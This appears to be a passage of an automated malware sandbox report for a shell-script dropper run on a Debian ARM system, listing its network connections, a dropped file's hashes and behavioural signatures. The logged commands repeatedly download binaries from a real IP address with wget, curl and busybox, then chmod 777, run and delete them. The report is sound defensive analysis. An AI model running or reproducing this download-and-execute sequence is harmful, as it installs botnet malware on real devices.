[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 89.187.167.5:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 03:22

Reported

2024-10-28 03:25

Platform

debian9-armhf-20240611-en

Max time kernel

52s

Max time network

57s

Command Line

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/rm N/A
